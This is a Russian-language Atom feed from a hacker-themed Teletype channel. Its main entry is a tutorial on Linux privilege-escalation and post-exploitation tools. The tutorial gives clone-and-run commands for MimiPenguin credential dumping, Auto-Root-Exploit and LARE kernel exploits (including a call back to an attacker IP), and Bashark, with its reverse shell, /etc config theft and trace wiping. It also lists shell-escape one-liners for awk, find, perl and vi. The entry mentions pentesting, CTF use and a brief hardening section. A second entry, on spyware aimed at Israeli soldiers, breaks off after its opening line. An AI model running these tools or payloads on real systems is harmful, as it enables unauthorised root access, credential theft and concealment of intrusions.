<?xml version="1.0" encoding="utf-8" ?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:tt="http://teletype.in/" xmlns:opensearch="http://a9.com/-/spec/opensearch/1.1/"><title>Save and Betray</title><subtitle>Канал #1 по контенту хакерской тематики</subtitle><author><name>Save and Betray</name></author><id>https://teletype.in/atom/saveandbetray</id><link rel="self" type="application/atom+xml" href="https://teletype.in/atom/saveandbetray?offset=0"></link><link rel="alternate" type="text/html" href="https://teletype.in/@saveandbetray?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=saveandbetray"></link><link rel="next" type="application/rss+xml" href="https://teletype.in/atom/saveandbetray?offset=10"></link><link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></link><updated>2026-04-05T15:36:51.809Z</updated><entry><id>saveandbetray:By12vzTKE</id><link rel="alternate" type="text/html" href="https://teletype.in/@saveandbetray/By12vzTKE?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=saveandbetray"></link><title>Повышение привилегий в Linux</title><published>2019-04-11T19:38:14.991Z</published><updated>2019-04-11T19:38:14.991Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/85/85f27322-65b9-4814-9037-189db7f3804f.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/ca/caa04b21-5c4a-48d0-bcbd-7c6c3bfe2f63.jpeg&quot;&gt;Наш telegram канал : @Save and betray</summary><content type="html">
  &lt;p&gt;Наш telegram канал : &lt;a href=&quot;https://tele.gg/save_and_betray&quot; target=&quot;_blank&quot;&gt;@Save and betray&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://tele.gg/joinchat/KIpU6VBtZBYfLi_02wRozg&quot; target=&quot;_blank&quot;&gt;Вступай в наши ряды&lt;/a&gt;&lt;/p&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/ca/caa04b21-5c4a-48d0-bcbd-7c6c3bfe2f63.jpeg&quot; width=&quot;1280&quot; /&gt;
  &lt;/figure&gt;
  &lt;ol&gt;
    &lt;li&gt;&lt;strong&gt;Эскалация — (повышение привилегий)&lt;/strong&gt; — это эксплуатация уязвимостей в операционной системе или прикладном ПО, позволяющая получить доступ к ресурсам, которые обычно защищены от определенного пользователя. В результате хакер имеет больше привилегий, чем предполагалось разработчиком или системным администратором, и может выполнять несанкционированные действия в целевой системе.&lt;/li&gt;
  &lt;/ol&gt;
  &lt;h3&gt;&lt;strong&gt;PXEnum&lt;/strong&gt;&lt;/h3&gt;
  &lt;p&gt;Основная задача данного скрипта — функция перечисления (англ. Enumeration). Он вытаскивает всю доступную информацию о системе. Скрипт создан для настоящих лентяев. Хорошо, если высказаться более политкорректно, то «для тех, кто ценит свое время». Встроенные команды позволяют также угонять &lt;a href=&quot;http://www.spy-soft.net/hash-identification/&quot; target=&quot;_blank&quot;&gt;хеши паролей&lt;/a&gt;, содержание директорий, все сведения о системе, наличие application-серверов, приложений, соединений, юзеров.&lt;/p&gt;
  &lt;p&gt;Для запуска скрипта не требуются права root, он работает в стандартном терминале. Перед установкой скачиваем инструмент с помощью Wget:&lt;/p&gt;
  &lt;blockquote&gt;&lt;em&gt;$ wget https://raw.githubusercontent.com/shawnduong/PXEnum/master/PXEnume.sh&lt;/em&gt;&lt;/blockquote&gt;
  &lt;p&gt;Установка PXEnum:&lt;/p&gt;
  &lt;p&gt;$ git clone https://github.com/shawnduong/PXEnum.git&lt;/p&gt;
  &lt;p&gt;$ cd PXEnum/&lt;/p&gt;
  &lt;p&gt;$ chmod +x PXEnum.sh&lt;/p&gt;
  &lt;p&gt;$ bash PXEnum.sh&lt;/p&gt;
  &lt;p&gt;Другой вариант запуска PXEnum:&lt;/p&gt;
  &lt;p&gt;$ sh PXEnum.sh&lt;/p&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;http://www.spy-soft.net/wp-content/uploads/linux-privilege-escalation.gif&quot; width=&quot;1232&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3&gt;&lt;strong&gt;MIDA Multitool&lt;/strong&gt;&lt;/h3&gt;
  &lt;p&gt;Другой интересный инструмент — &lt;a href=&quot;http://www.spy-soft.net/go-to/https://github.com/NullArray/MIDA-Multitool&quot; target=&quot;_blank&quot;&gt;MIDA Multitool&lt;/a&gt;, созданный на базе менее популярных собратьев &lt;a href=&quot;http://www.spy-soft.net/go-to/https://github.com/NullArray/SysEnum&quot; target=&quot;_blank&quot;&gt;SysEnum&lt;/a&gt; и &lt;a href=&quot;http://www.spy-soft.net/go-to/https://github.com/NullArray/RootHelper&quot; target=&quot;_blank&quot;&gt;RootHelper&lt;/a&gt;, но предлагающий гораздо больше возможностей.&lt;/p&gt;
  &lt;p&gt;По воле разработчика MIDA Multitool объединяет в себе отдельные функции своих предшественников, а именно:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;&lt;strong&gt;SysEnum&lt;/strong&gt; — Bash-скрипт, предназначенный для получения основной информации о системе, включая следующие данные: текущий пользователь, IP-конфигурация, таблицы ARP, запущенные процессы;&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;RootHelper&lt;/strong&gt; — призван помочь в деле эскалации привилегий в системе, которая была скомпрометирована, при помощи выполнения ряда перечислений и использования доверительных сценариев.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p&gt;Установка MIDA Multitool в систему с GitHub:&lt;/p&gt;
  &lt;p&gt;$ git clone https://github.com/NullArray/Bash-Kit-Multitool&lt;/p&gt;
  &lt;p&gt;$ cd Bash-Kit-Multitool&lt;/p&gt;
  &lt;p&gt;$ chmod +x bashkit.sh&lt;/p&gt;
  &lt;p&gt;Запускаем скрипта MIDA Multitool :&lt;/p&gt;
  &lt;p&gt;$ /.bashkit.sh&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;http://www.spy-soft.net/wp-content/uploads/linux-privilege-escalation-1.png&quot; width=&quot;768&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Вывод некоторой информации по системе:&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;http://www.spy-soft.net/wp-content/uploads/linux-privilege-escalation-2.jpg&quot; width=&quot;454&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3&gt;&lt;strong&gt;MimiPenguin&lt;/strong&gt;&lt;/h3&gt;
  &lt;p&gt;Очень хорошо известный в узких кругах пентестеров скрипт под названием &lt;a href=&quot;http://www.spy-soft.net/go-to/https://github.com/huntergregal/mimipenguin&quot; target=&quot;_blank&quot;&gt;MimiPenguin&lt;/a&gt;. Основная задача утилиты — сброс пароля на вход в систему от текущего пользователя Linux (то есть непривилегированного). В некотором роде это аналог утилиты &lt;a href=&quot;http://www.spy-soft.net/mimikatz/&quot; target=&quot;_blank&quot;&gt;mimikatz&lt;/a&gt; для дампа пароля в Windows-системах.&lt;/p&gt;
  &lt;p&gt;Кроме того, MimiPenguin поддерживает такие приложения, как VSFTPd (активные подключения клиента FTP), Apache 2 (активные/старые сеансы HTTP BASIC AUTH, но для этого требуется Gcore) и OpenSSH-сервер (активные подключения SSH с использованием команды sudo). И вообще, необходимо сказать, что MimiPenguin нередко становится частью эксплоитов под Linux, так что тулза очень и очень востребована.&lt;/p&gt;
  &lt;p&gt;Установка MimiPenguin с репозитория GitHub:&lt;/p&gt;
  &lt;p&gt;$ git clone https://github.com/huntergregal/mimipenguin&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;http://www.spy-soft.net/wp-content/uploads/linux-privilege-escalation-4.png&quot; width=&quot;717&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Если у вас еще не установлен GitHub, то используйте эти команды:&lt;/p&gt;
  &lt;p&gt;$ apt install git       // Debian/Ubuntu systems&lt;/p&gt;
  &lt;p&gt;$ yum install git       // RHEL/CentOS systems&lt;/p&gt;
  &lt;p&gt;Переходим в директорию MimiPenguin и запускаем скрипт:&lt;/p&gt;
  &lt;p&gt;$ cd mimipenguin&lt;/p&gt;
  &lt;p&gt;$ ls –a&lt;/p&gt;
  &lt;p&gt;$ chmod +x mimipenguin.sh&lt;/p&gt;
  &lt;p&gt;$ ./mimipenguin.sh&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;http://www.spy-soft.net/wp-content/uploads/linux-privilege-escalation-3.png&quot; width=&quot;730&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3&gt;&lt;strong&gt;Auto-Root-Exploit&lt;/strong&gt;&lt;/h3&gt;
  &lt;p&gt;Сингловый &lt;a href=&quot;http://www.spy-soft.net/go-to/https://github.com/nilotpalbiswas/Auto-Root-Exploit&quot; target=&quot;_blank&quot;&gt;скрипт&lt;/a&gt;, созданный для одной-единственной цели — получить права root на текущую учетную запись, под которой он был запущен с помощью эксплуатации известных багов. Поддерживает версии ядра, начиная с Linux Kernel 2.6 и до 4.8.0-41-generic, а также часть ОС семейства *BSD.&lt;/p&gt;
  &lt;p&gt;Установка Auto-Root-Exploit в систему:&lt;/p&gt;
  &lt;p&gt;$ git clone https://github.com/nilotpalbiswas/Auto-Root-Exploit&lt;/p&gt;
  &lt;p&gt;$ cd Auto-Root-Exploit&lt;/p&gt;
  &lt;p&gt;$ chmod +x autoroot.sh&lt;/p&gt;
  &lt;p&gt;Проверка версии ядра (для того чтобы выбрать нужный &lt;a href=&quot;http://www.spy-soft.net/popular-exploit-packs/&quot; target=&quot;_blank&quot;&gt;эксплоит-пак&lt;/a&gt;):&lt;/p&gt;
  &lt;p&gt;&amp;lt;span class=&amp;quot;pln&amp;quot;&amp;gt;$ uname &amp;lt;/span&amp;gt;&amp;lt;span class=&amp;quot;pun&amp;quot;&amp;gt;–&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;quot;pln&amp;quot;&amp;gt;a&amp;lt;/span&amp;gt;&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;http://www.spy-soft.net/wp-content/uploads/linux-privilege-escalation-1.jpg&quot; width=&quot;1012&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Использование Auto-Root-Exploit:&lt;/p&gt;
  &lt;p&gt;$ bash autoroot.sh N&lt;/p&gt;
  &lt;p&gt;for kernel version 2.6 all&lt;/p&gt;
  &lt;p&gt;bash autoroot.sh 2&lt;/p&gt;
  &lt;p&gt;for kernel version 3 all&lt;/p&gt;
  &lt;p&gt;bash autoroot.sh 3&lt;/p&gt;
  &lt;p&gt;for kernel version 4 all&lt;/p&gt;
  &lt;p&gt;bash autoroot.sh 4&lt;/p&gt;
  &lt;p&gt;for freebsd &amp;amp; openbsd all&lt;/p&gt;
  &lt;p&gt;bash autoroot.sh bsd&lt;/p&gt;
  &lt;p&gt;for apple macos all&lt;/p&gt;
  &lt;p&gt;bash autoroot.sh app&lt;/p&gt;
  &lt;p&gt;for kernel 2.6,3,4 bsd &amp;amp; app all&lt;/p&gt;
  &lt;p&gt;bash autoroot.sh all&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;http://www.spy-soft.net/wp-content/uploads/linux-privilege-escalation-.png&quot; width=&quot;640&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;http://www.spy-soft.net/wp-content/uploads/linux-privilege-escalation-5.png&quot; width=&quot;640&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3&gt;&lt;strong&gt;LARE&lt;/strong&gt;&lt;/h3&gt;
  &lt;p&gt;И напоследок еще один довольно простой &lt;a href=&quot;http://www.spy-soft.net/go-to/https://github.com/EnigmaDimitri/LARE&quot; target=&quot;_blank&quot;&gt;скрипт&lt;/a&gt;, который позволяет с помощью использования известных уязвимостей в ядре ОС получать привилегии root удаленно с атакующей машины. Скрипт использует локальные эксплоиты для получения root-прав для версий ядра Linux Kernel v2.6 — v4.8.&lt;/p&gt;
  &lt;p&gt;Кстати, этот инструмент очень часто находит свое применение в различных War Games и CTF-соревнованиях, например hackthebox.gr, или даже на сертификационном экзамене &lt;a href=&quot;http://www.spy-soft.net/go-to/https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/&quot; target=&quot;_blank&quot;&gt;OSCP&lt;/a&gt;.&lt;/p&gt;
  &lt;p&gt;Устанавка LARE в систему:&lt;/p&gt;
  &lt;p&gt;$ git clone https://github.com/EnigmaDimitri/LARE &amp;amp;&amp;amp; cd LARE&lt;/p&gt;
  &lt;p&gt;$ chmod +x LARA.sh&lt;/p&gt;
  &lt;p&gt;Пример локального запуска LARE:&lt;/p&gt;
  &lt;p&gt;$ LARE.sh -a&lt;/p&gt;
  &lt;p&gt;или&lt;/p&gt;
  &lt;p&gt;$ ./LARE.sh -a&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;http://www.spy-soft.net/wp-content/uploads/linux-privilege-escalation-6.png&quot; width=&quot;640&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Запуск скрипта на целевой машине в сети:&lt;/p&gt;
  &lt;p&gt;$ LARE.sh -l [Attackers-IP]&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;http://www.spy-soft.net/wp-content/uploads/linux-privilege-escalation-7.png&quot; width=&quot;640&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Запуск на машине с подключением к базе данных эксплоитов на GitHub:&lt;/p&gt;
  &lt;p&gt;$ LARE.sh -l or ./LARE.sh -l&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;Проверка и защита системы от техник постэксплуатации&lt;/strong&gt;&lt;/h3&gt;
  &lt;p&gt;Кроме традиционных мер, таких как установка патчей и минимизация привилегий, безопасность системы дополнительно обеспечивают специальные утилиты для проверки системы. В противовес популярному мнению (согласно которому к постэксплуатации ведут только зиродеи или устаревший софт) к грандиозному факапу ведут и ошибки конфигурации — предоставление избыточных прав доступа, пароли по умолчанию, системные каталоги и файлы в общем доступе, выключенные опции безопасности в программах, работающих из коробки, и прочие огрехи.&lt;/p&gt;
  &lt;p&gt;Ниже будут представлены утилиты (скрипты) быстрого анализа системы и проверки ее на факт выполнения несанкционированных и потенциально опасных действий со стороны непривилегированных пользователей.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;Bashark&lt;/strong&gt;&lt;/h3&gt;
  &lt;p&gt;&lt;a href=&quot;http://www.spy-soft.net/go-to/https://github.com/TheSecondSun/Bashark&quot; target=&quot;_blank&quot;&gt;Bashark&lt;/a&gt; — популярный скрипт, который помогает пентестерам и исследователям в области информационной безопасности тестить возможности управления системой после успешной эксплуатации.&lt;/p&gt;
  &lt;p&gt;Фирменные фичи и возможности, заявленные разработчиком:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;быстрый запуск, мгновенная реакция;&lt;/li&gt;
    &lt;li&gt;мультиплатформенность: Unix, OS X, Solaris и другие;&lt;/li&gt;
    &lt;li&gt;отсутствие зависимостей от версии ядра ОС или установленных пакетов;&lt;/li&gt;
    &lt;li&gt;иммунитет к эвристическому и поведенческому анализу (обход средств защиты);&lt;/li&gt;
    &lt;li&gt;встроенные &lt;a href=&quot;https://ru.wikipedia.org/wiki/Alias_(bash)&quot; target=&quot;_blank&quot;&gt;алиасы&lt;/a&gt; к популярным командам;&lt;/li&gt;
    &lt;li&gt;расширение стандартной оболочки bash-командами для постэксплуатации;&lt;/li&gt;
    &lt;li&gt;процедура заметания следов после завершения работы (Stealthy);&lt;/li&gt;
    &lt;li&gt;расширяемость — возможность дописывать свои команды и юзать из терминала;&lt;/li&gt;
    &lt;li&gt;поддержка табуляции при наборе команд.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p&gt;Итак, качаем скрипт Bashark с помощью Git:&lt;/p&gt;
  &lt;p&gt;1&lt;/p&gt;
  &lt;p&gt;$ git clone https://github.com/TheSecondSun/Bashark.git&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;http://www.spy-soft.net/wp-content/uploads/linux-privilege-escalation-8.png&quot; width=&quot;651&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Переходим в соответствующую директорию и даем права на выполнение:&lt;/p&gt;
  &lt;p&gt;$ cd Bashark&lt;/p&gt;
  &lt;p&gt;$ chmod +x bashark.sh&lt;/p&gt;
  &lt;p&gt;Запускаем Bashark:&lt;/p&gt;
  &lt;p&gt;$ ./bashark.sh&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;http://www.spy-soft.net/wp-content/uploads/linux-privilege-escalation-3.jpg&quot; width=&quot;663&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;В чем еще уникальность Bashark? С помощью опции &lt;strong&gt;portscan&lt;/strong&gt; мы можем сканировать внутреннюю сетку из-под одной скомпрометированной машины. Чтобы получить все файлы конфигурации с другой взломанной машины на Linux, можно использовать опцию &lt;strong&gt;getconf&lt;/strong&gt;. Команда позволяет извлекать все файлы конфигурации, хранящиеся в каталоге /etc. Точно так же легко и просто можно использовать опцию &lt;strong&gt;getprem&lt;/strong&gt; для просмотра всех двоичных файлов на целевой системе.&lt;/p&gt;
  &lt;p&gt;Сканируем удаленную машину с помощью Bashark:&lt;/p&gt;
  &lt;p&gt;$ portscan &amp;lt;target’s IP&amp;gt;&lt;/p&gt;
  &lt;p&gt;Получаем конфиги:&lt;/p&gt;
  &lt;p&gt;$ getconf&lt;/p&gt;
  &lt;p&gt;Получаем файлы:&lt;/p&gt;
  &lt;p&gt;$ getprem&lt;/p&gt;
  &lt;p&gt;Получаем реверс-шелл:&lt;/p&gt;
  &lt;p&gt;$ revshell &amp;lt;target’s IP&amp;gt; &amp;lt;Port 31337&amp;gt;&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;http://www.spy-soft.net/wp-content/uploads/linux-privilege-escalation-4.jpg&quot; width=&quot;557&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Еще одна приятная мелочь — это фича самоочистки (удаления следов работы в системе). Например, если вы создавали файлы или каталоги во время работы в контексте Bashark с помощью опции &lt;strong&gt;-t&lt;/strong&gt; (создать файл) или &lt;strong&gt;-mkd&lt;/strong&gt; (создать каталог), подпрограмма quit (то есть завершение работы) будет активировать директиву &lt;strong&gt;cleanup&lt;/strong&gt;, затирающую все следы присутствия в системе.&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;http://www.spy-soft.net/wp-content/uploads/linux-privilege-escalation-5.jpg&quot; width=&quot;827&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3&gt;&lt;strong&gt;LinEnum&lt;/strong&gt;&lt;/h3&gt;
  &lt;p&gt;Данный &lt;a href=&quot;http://www.spy-soft.net/go-to/https://github.com/rebootuser/LinEnum&quot; target=&quot;_blank&quot;&gt;скрипт&lt;/a&gt; представляет собой экспресс-тест по таким позициям, как Kernel and distribution release details, System Information, Privileged access, Jobs/Tasks, Services, Default/Weak Credentials, Searches, Platform/software specific tests.&lt;/p&gt;
  &lt;p&gt;Скрипт LinEnum успешно протестирован на различных версиях дистрибутивов Ubuntu, Debian, Red Hat и CentOS. Программа не ищет и не пытается выполнять эксплоиты, как некоторые другие аналогичные рассмотренные в статье инструменты повышения привилегий в Linux, — она только собирает информацию и делает проверки возможных векторов эскалации привилегий.&lt;/p&gt;
  &lt;p&gt;Установка LinEnum в систему:&lt;/p&gt;
  &lt;p&gt;1&lt;/p&gt;
  &lt;p&gt;2&lt;/p&gt;
  &lt;p&gt;$ git clone https://github.com/rebootuser/LinEnum&lt;/p&gt;
  &lt;p&gt;$ cd LinEnum/&lt;/p&gt;
  &lt;p&gt;Простой запуск с вызовом списка ключей:&lt;/p&gt;
  &lt;p&gt;1&lt;/p&gt;
  &lt;p&gt;$ ./LinEnum.sh&lt;/p&gt;
  &lt;p&gt;Пример запуска LinEnum с опциями (ключами):&lt;/p&gt;
  &lt;p&gt;1&lt;/p&gt;
  &lt;p&gt;$ ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t&lt;/p&gt;
  &lt;p&gt;Описание ключей LinEnum:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;-k — ввести ключевое слово&lt;/li&gt;
    &lt;li&gt;-e — указать директорию для экспорта отчета&lt;/li&gt;
    &lt;li&gt;-t — включить в отчет «длинные» тесты (дополнительные тесты)&lt;/li&gt;
    &lt;li&gt;-s — произвести проверку эскалации текущей учетки sudo perms&lt;/li&gt;
    &lt;li&gt;-r — задать имя итогового отчета&lt;/li&gt;
    &lt;li&gt;-h — вызвать встроенную справку по программе&lt;/li&gt;
    &lt;li&gt;-k — опциональный переключатель, с которым можно указать ключевое слово для поиска файлов по нескольким расширениям&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p&gt;Запуск без опций означает ограниченное сканирование без файла вывода.&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;http://www.spy-soft.net/wp-content/uploads/linux-privilege-escalation-9.png&quot; width=&quot;500&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;http://www.spy-soft.net/wp-content/uploads/linux-privilege-escalation-10.png&quot; width=&quot;1527&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3&gt;&lt;strong&gt;LinuxPrivChecker&lt;/strong&gt;&lt;/h3&gt;
  &lt;p&gt;Еще один полезный в эскалации привилегий &lt;a href=&quot;http://www.spy-soft.net/go-to/https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py&quot; target=&quot;_blank&quot;&gt;скрипт&lt;/a&gt;, написанный на Python. Этот инструмент предназначен для локального выполнения в системе с целью перечисления базовой системной информации и поиска общих векторов повышения привилегий, таких как общедоступные файлы, неверные конфигурации демонов и библиотек, пароли, хранимые в виде открытого текста, и баги, соответствующие наиболее популярным эксплоитам.&lt;/p&gt;
  &lt;p&gt;Основные области проверки:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;основная информация о системе (ОС, ядро, имя системы и так далее);&lt;/li&gt;
    &lt;li&gt;информация о сети (ifconfig, route, netstat и т. д.);&lt;/li&gt;
    &lt;li&gt;разная информация о файловой системе (mount, fstab, cron jobs);&lt;/li&gt;
    &lt;li&gt;информация о пользователе (текущий пользователь, все пользователи, суперпользователи, история команд);&lt;/li&gt;
    &lt;li&gt;права доступа к файлам и каталогам (доступные для записи файлы/каталоги, файлы suid, корневой домашний каталог);&lt;/li&gt;
    &lt;li&gt;файлы, содержащие незашифрованные пароли;&lt;/li&gt;
    &lt;li&gt;интересные файлы, процессы и приложения (все процессы и пакеты, все процессы, запускаемые пользователем root и связанные пакеты, версия sudo, файл конфигурации Apache);&lt;/li&gt;
    &lt;li&gt;все установленные языки и инструменты (GCC, Perl, Python, Nmap, Netcat, Wget, FTP и так далее);&lt;/li&gt;
    &lt;li&gt;все соответствующие эксплоиты повышения привилегий (с использованием базы данных эксплоитов с применимыми версиями ядра, пакетами/процессами программного обеспечения).&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p&gt;Проверка на эскалацию привилегий производится в следующих программах:&lt;/p&gt;
  &lt;p&gt;nmap&lt;/p&gt;
  &lt;p&gt;-interactive&lt;/p&gt;
  &lt;p&gt;vi&lt;/p&gt;
  &lt;p&gt;:!bash&lt;/p&gt;
  &lt;p&gt;:set shell=/bin/bash:shell&lt;/p&gt;
  &lt;p&gt;awk&lt;/p&gt;
  &lt;p&gt;awk ‘BEGIN {system(“/bin/bash”)}’&lt;/p&gt;
  &lt;p&gt;find&lt;/p&gt;
  &lt;p&gt;find / -exec /usr/bin/awk ‘BEGIN {system(“/bin/bash”)}’ \;&lt;/p&gt;
  &lt;p&gt;perl&lt;/p&gt;
  &lt;p&gt;perl -e ‘exec “/bin/bash”;’&lt;/p&gt;
  &lt;p&gt;Итак, качаем скрипт LinuxPrivChecker:&lt;/p&gt;
  &lt;p&gt;1&lt;/p&gt;
  &lt;p&gt;$ wget http://www.securitysift.com/download/linuxprivchecker.py&lt;/p&gt;
  &lt;p&gt;Запускаем LinuxPrivChecker с помощью всего лишь одной команды:&lt;/p&gt;
  &lt;p&gt;1&lt;/p&gt;
  &lt;p&gt;2&lt;/p&gt;
  &lt;p&gt;$ chmod +x linuxprivchecker.py&lt;/p&gt;
  &lt;p&gt;$ ./linuxprivchecker.py&lt;/p&gt;
  &lt;p&gt;Или другой вариант запуска LinuxPrivChecker:&lt;/p&gt;
  &lt;p&gt;1&lt;/p&gt;
  &lt;p&gt;$ python linuxprivchecker.py&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;http://www.spy-soft.net/wp-content/uploads/linux-privilege-escalation-11.png&quot; width=&quot;794&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3&gt;&lt;strong&gt;Unix-privesc-check&lt;/strong&gt;&lt;/h3&gt;
  &lt;p&gt;&lt;a href=&quot;http://www.spy-soft.net/go-to/https://github.com/pentestmonkey/unix-privesc-check&quot; target=&quot;_blank&quot;&gt;Unix-privesc-checker&lt;/a&gt; — это мощный скрипт, работающий в Unix-системах (протестирован на Solaris 9, HPUX 11, различных Linux 3.х и FreeBSD 6.2+). После запуска скрипт пытается найти неправильные твики конфигурации системы, процессы, которые могут позволить локальным непривилегированным пользователям повышать привилегии других юзеров или получать доступ к локальным приложениям, например базам данных MySQL.&lt;/p&gt;
  &lt;p&gt;Основные области проверки:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;&lt;a href=&quot;http://www.spy-soft.net/baddest-passwords-2018/&quot; target=&quot;_blank&quot;&gt;слабые пароли&lt;/a&gt; и значения по умолчанию;&lt;/li&gt;
    &lt;li&gt;конфигурация стека IP (без ненужного использования IPv6, без форвардинга IP-пакетов и так далее);&lt;/li&gt;
    &lt;li&gt;некорректные права доступа к файлам (чтение/изменение конфиденциальных данных);&lt;/li&gt;
    &lt;li&gt;настройка локальных приложений (просмотр &lt;a href=&quot;http://www.spy-soft.net/go-to/https://www.opennet.ru/man.shtml?topic=sshd_config&amp;category=5&amp;russian=0&quot; target=&quot;_blank&quot;&gt;sshd_config&lt;/a&gt;, &lt;a href=&quot;http://www.spy-soft.net/go-to/https://httpd.apache.org/docs/2.4/configuring.html&quot; target=&quot;_blank&quot;&gt;httpd.conf&lt;/a&gt;);&lt;/li&gt;
    &lt;li&gt;другие полезные вещи (например, удаленное ведение журнала, использование небезопасных протоколов TCP/IP).&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p&gt;Основное внимание разработчики данного скрипта уделяют проверке на предмет распространенных ошибок в конфигурации системы и некорректно настроенных разрешений на доступ к директориям и файлам. Важно отметить, что скрипт не проверяет наличие отсутствующих патчей для ядра ОС или установленных пакетов, но это и не его задача, ведь для ее решения существуют более сложные утилиты, о которых мы рассказывали в нашем предыдущем материале про &lt;a href=&quot;http://www.spy-soft.net/linux-hardening-tools/&quot; target=&quot;_blank&quot;&gt;аудит Linux&lt;/a&gt;.&lt;/p&gt;
  &lt;p&gt;Скрипт может запускаться как от имени обычного пользователя, так и от имени root. В последнем случае у скрипта больше привилегий и он может выполнить ряд тестов, недоступных из-под учетной записи непривилегированного пользователя. Для регулярного мониторинга запуск скрипта можно прописать как задание cron.&lt;/p&gt;
  &lt;p&gt;Пример запуска скрипта Unix-privesc-check:&lt;/p&gt;
  &lt;p&gt;1&lt;/p&gt;
  &lt;p&gt;$ ./unix-privesc-check &amp;gt; output.txt&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;http://www.spy-soft.net/wp-content/uploads/linux-privilege-escalation-6.jpg&quot; width=&quot;737&quot; /&gt;
  &lt;/figure&gt;

</content></entry><entry><id>saveandbetray:Ske_wfqtV</id><link rel="alternate" type="text/html" href="https://teletype.in/@saveandbetray/Ske_wfqtV?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=saveandbetray"></link><title>Хакеры использовали вредоносное ПО, чтобы шпионить за Израильскими Военнослужащими</title><published>2019-04-09T13:00:24.167Z</published><updated>2019-04-09T13:00:24.167Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/84/846b24ed-0466-4c60-810d-f793b25560ba.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/28/282b10e9-3573-46c1-a31b-d491aadbb4b8.jpeg&quot;&gt;Наш telegram канал : @Save and betray</summary><content type="html">
  &lt;p&gt;Наш telegram канал : &lt;a href=&quot;https://tele.gg/save_and_betray&quot; target=&quot;_blank&quot;&gt;@Save and betray&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://tele.gg/joinchat/KIpU6VBtZBYfLi_02wRozg&quot; target=&quot;_blank&quot;&gt;Вступай в наши ряды&lt;/a&gt;&lt;/p&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/28/282b10e9-3573-46c1-a31b-d491aadbb4b8.jpeg&quot; width=&quot;1280&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;&lt;strong&gt;Как военнослужащие смогли допустить такое?&lt;/strong&gt;&lt;/p&gt;
